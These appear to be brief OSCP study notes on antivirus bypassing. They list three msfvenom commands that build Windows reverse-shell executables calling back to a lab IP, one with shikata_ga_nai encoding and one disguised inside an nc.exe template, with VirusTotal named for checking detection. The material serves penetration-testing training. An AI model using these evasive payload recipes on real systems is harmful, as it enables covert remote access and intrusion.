OSCP Learning Notes Exploit(6)

Antivirus Bypassing

Tools: Kali Linux

Detection Platform: https://www.virustotal.com/gui/home/upload

1.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -o shell1.exe

2.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -e x86/shikata_ga_nai -o shell2.exe

3.

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.200 LPORT=4444 -f exe -e x86/shikata_ga_nai -x /usr/share/windows-binaries/nc.exe -o shell3.exe

相信未来 - 该面对的绝不逃避,该执著的永不怨悔,该舍弃的不再留念,该珍惜的好好把握。
原文地址:https://www.cnblogs.com/keepmoving1113/p/11197883.html